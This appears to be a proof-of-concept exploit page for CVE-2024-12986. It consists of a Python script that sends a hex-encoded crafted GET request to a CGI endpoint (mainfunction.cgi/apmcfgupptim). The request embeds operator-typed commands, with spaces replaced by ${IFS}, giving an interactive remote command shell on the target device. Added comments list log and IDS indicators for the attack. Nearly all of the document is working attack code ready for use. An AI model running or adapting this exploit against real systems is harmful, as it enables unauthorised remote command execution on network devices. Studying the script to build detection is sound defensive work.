README.md not found for CVE-2024-12986. The file may not exist in the repository.
POC / exploit.py PY
import socket
import socks

# Target endpoint. Both values are literal placeholder strings as published,
# not a real address or port number.
HOST = 'host'
PORT = 'port'

# Terminal colours (ANSI SGR escape sequences) used only for console output;
# RESET restores the default rendition after a coloured span.
RED = "\x1b[91m"
GREEN = "\x1b[92m"
YELLOW = "\x1b[93m"
BLUE = "\x1b[94m"
CYAN = "\x1b[96m"
RESET = "\x1b[0m"

def send_http_request(host_ip, host_port, request):
    """Send a hex-encoded request over one TCP connection and return the reply.

    Args:
        host_ip: Address handed to ``connect``.
        host_port: Port handed to ``connect``.
        request: ASCII hex digits as ``bytes``. They are decoded with
            ``bytes.fromhex`` into the raw bytes that go on the wire, so the
            request may contain bytes that are not valid text.

    Returns:
        The reply decoded as UTF-8 with undecodable bytes replaced, or
        ``None`` if any exception was raised along the way.
    """
    # Rebinds the socket class for the whole interpreter, not just this call:
    # every later socket.socket(...) in the process yields a PySocks socket.
    # NOTE(review): no proxy is configured anywhere in this file; presumably
    # the PySocks socket then connects directly. Confirm against PySocks.
    socket.socket = socks.socksocket
    try:
        print(f"{CYAN}Connecting to {host_ip}:{host_port}...{RESET}")
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            # One 10-second timeout applies to connect, send and each recv.
            s.settimeout(10)
            s.connect((host_ip, host_port))
            
            # Hex text -> raw bytes; a malformed hex string raises ValueError,
            # which the broad handler below turns into a None return.
            request = bytes.fromhex(request.decode())
            print(f"{GREEN}Sending HTTP request...{RESET}")
            s.sendall(request)
            print(f"{GREEN}HTTP request sent successfully!{RESET}")
            
            # Accumulate until the peer closes the connection (recv returns
            # b""). If the peer stalls instead, the timeout raises and the
            # partial reply collected so far is discarded by the handler.
            response = b""
            while True:
                data = s.recv(4096)
                if not data:
                    break
                response += data
            
            return response.decode('utf-8', errors='replace')
    except Exception as e:
        # Connection failures, timeouts and decoding errors are all reported
        # the same way; the caller only sees None.
        print(f"{RED}An error occurred: {e}{RESET}")
        return None

def start_shell():
    """Prompt for commands in a loop and send each one inside a crafted GET.

    Every line typed at the prompt (other than ``exit``) is embedded in the
    ``session`` query value of a request to
    ``/cgi-bin/mainfunction.cgi/apmcfgupptim`` and sent to ``HOST``/``PORT``.
    The reply, if any, is printed to the console.

    Indicators visible in the request this function builds (useful for web
    log and IDS rules covering CVE-2024-12986):
      * request target ``/cgi-bin/mainfunction.cgi/apmcfgupptim`` with an
        unusually long ``session`` value;
      * the literal text ``%52$c`` and a raw non-ASCII byte (0xb4) inside
        that value;
      * ``${IFS}`` inside the query string;
      * an ``HTTP/1.0`` request line followed directly by the blank line,
        i.e. no ``Host`` or other header.
    Mitigation is the vendor's fix for CVE-2024-12986; this page does not
    name the fixed version.
    """
    print(f"{BLUE}{'=' * 50}{RESET}")
    print(f"{YELLOW}Interactive Shell Started{RESET}")
    print(f"{YELLOW}Type your commands below. Type 'exit' to quit.{RESET}")
    print(f"{BLUE}{'=' * 50}{RESET}")
    
    while True:
        command = input(f"{CYAN}shell>{RESET} ")
        if command.lower() == 'exit':
            print(f"{YELLOW}Exiting the shell. Goodbye!{RESET}")
            break

        # A literal space would end the request target in the HTTP request
        # line, so each space is swapped for the text ${IFS}. No other
        # character of the input is escaped or validated.
        command_with_ifs = command.replace(" ", "${IFS}")
        # The request is assembled as ASCII hex and decoded by the sender.
        # Prefix decodes to:
        #   GET /cgi-bin/mainfunction.cgi/apmcfgupptim?session=
        # followed by a run of 'x' filler bytes, then "0", the byte 0xb4 and
        # "%52$c%52$c". The operator's text is appended next, and the suffix
        # decodes to " HTTP/1.0\r\n\r\n".
        # NOTE(review): "%52$c" has the shape of a positional printf
        # conversion; the page does not explain its role. Confirm against
        # the advisory before relying on it in a signature.
        payload_binary = (
            b'474554202f6367692d62696e2f6d61696e66756e6374696f6e2e6367692f61706d63666775707074696d3f73657373696f6e3d7878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787830b425353224632535322463'
            + command_with_ifs.encode().hex().encode()
            + b'20485454502f312e300d0a0d0a'
        )

        # Send the crafted payload
        response = send_http_request(HOST, PORT, payload_binary)

        # Display the response. Both None (an exception in the sender) and an
        # empty reply take the else branch.
        if response:
            print(f"{BLUE}{'=' * 50}{RESET}")
            print(f"{GREEN}HTTP response received:{RESET}")
            print(f"{BLUE}{'=' * 50}{RESET}")
            print(response)
            print(f"{BLUE}{'=' * 50}{RESET}")
        else:
            print(f"{RED}No response received. Please check the host, port, or payload.{RESET}")

# Script entry point: run the prompt loop only when executed directly, and
# turn Ctrl-C into a short farewell message instead of a traceback.
if __name__ == "__main__":
    try:
        start_shell()
    except KeyboardInterrupt:
        print(f"\n{YELLOW}Shell interrupted. Goodbye!{RESET}")